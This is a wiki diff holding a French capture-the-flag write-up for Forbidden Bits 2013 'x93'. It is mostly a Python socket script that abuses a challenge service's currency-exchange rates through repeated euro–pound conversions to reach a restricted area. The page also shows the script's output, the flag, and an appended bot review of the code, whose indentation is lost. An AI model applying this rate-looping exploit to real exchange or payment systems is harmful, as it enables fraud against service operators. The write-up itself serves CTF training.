— |
forbiddenbits_2013_x93 [2017/04/09 15:33] (Version actuelle) |
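--- a/forbiddenbits_2013_x93
+++ b/forbiddenbits_2013_x93
@@ -0,0 +1,130 @@
+===== x93 (350) =====
+<code>i wanna access the restricted area
+95.170.83.28:3003</code>
+==== Overview ====
+On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre).
+Qui dit échanges, dit taux.
+Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !
+
+Le but ici va être de récupérer $5000 à partir de $100, 100€ et 100£.
+
+==== Solution ====
+J'ai choisie de jouer avec les € et les £ pour ensuite convertir les € en $.
+
+<code>€ => £
+£ => €
+...
+€ => $</code>
+
+<code python>import socket
+
+def msg(data):
+return data + "\n"
+
+def parseamount(buffer):
+splt = buffer.split(' , ')
+usd = splt[0][17:-4]
+eur = splt[1][:-4]
+gbp = splt[2][:-9]
+return (usd, eur, gbp)
+
+def main():
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect(('95.170.83.28', 3003))
+
+USD = 100
+EUR = 100
+GBP = 100
+
+sock.recv(512) # welcome message
+sock.recv(512) # wanna trade?
+sock.send(msg('yes')) # YES!
+sock.recv(512) # username?
+sock.send(msg('Xartrick')) # here!
+sock.recv(512) # Thanks!
+
+while 1:
+# GBP to EUR
+sock.recv(512) # get menu
+sock.send(msg('2')) # exchange
+sock.recv(512) # destination?
+sock.send(msg('EUR')) # EUR!
+sock.recv(512) # source?
+sock.send(msg('GBP')) # GBP!
+sock.recv(512) # amount?
+sock.send(msg(str(GBP))) # GBP value
+buffer = sock.recv(512) # get current values
+(USD, EUR, GBP) = parseamount(buffer)
+print 'EUR =>', EUR
+
+if float(EUR) > 5000.0:
+break
+
+# EUR to GBP
+sock.recv(512) # get menu
+sock.send(msg('2')) # exchange
+sock.recv(512) # destination?
+sock.send(msg('GBP')) # GBP!
+sock.recv(512) # source?
+sock.send(msg('EUR')) # EUR!
+sock.recv(512) # amount?
+sock.send(msg(str(EUR))) # EUR value
+buffer = sock.recv(512) # get current values
+(USD, EUR, GBP) = parseamount(buffer)
+print 'GBP =>', GBP
+
+# EUR to USD
+sock.recv(512) # get menu
+sock.send(msg('2')) # exchange
+sock.recv(512) # destination?
+sock.send(msg('USD')) # USD!
+sock.recv(512) # source?
+sock.send(msg('EUR')) # EUR!
+sock.recv(512) # amount?
+sock.send(msg(str(EUR))) # EUR value
+buffer = sock.recv(512) # get current values
+(USD, EUR, GBP) = parseamount(buffer)
+
+print 'USD =>', USD
+
+
+sock.recv(512) # get menu
+sock.send(msg('4')) # restricted area
+buffer = sock.recv(512)
+print buffer
+
+sock.close()
+
+main()</code>
+
+<code>C:\CTF\FBCTF\x93>script.py
+EUR => 253.85
+GBP => 218.31
+EUR => 335.86
+GBP => 288.84
+EUR => 444.37
+GBP => 382.16
+EUR => 587.94
+GBP => 505.63
+EUR => 777.89
+GBP => 668.99
+EUR => 1029.22
+GBP => 885.13
+EUR => 1361.74
+GBP => 1171.1
+EUR => 1801.69
+GBP => 1549.45
+EUR => 2383.77
+GBP => 2050.04
+EUR => 3153.91
+GBP => 2712.36
+EUR => 4172.86
+GBP => 3588.66
+EUR => 5521.02
+
+USD => 6062.7
+
+FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}</code>
+
+==== Flag ====
+<code>7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0</code>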
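Review bot: Every step of the dialogue in `main()` assumes one bare `sock.recv(512)` returns exactly one server prompt, but TCP has no message boundaries, so a split or merged read leaves the script out of step with the server. `parseamount` then cuts the balance line at fixed offsets such as `splt[0][17:-4]` with no check that the buffer has the expected shape; a guard like `if len(splt) < 3: raise ValueError(buffer)` would turn a silent wrong amount into a visible failure. The socket also has no timeout and uses `send`, which may write only part of the data; `sock.settimeout(10)` after `connect` and `sock.sendall(msg(...))` in place of `sock.send(msg(...))` are the minimal changes. The rendering has dropped the script's indentation, so which statements belong to the `while 1:` body is inferred only from the sample output, where the USD line appears once after the loop.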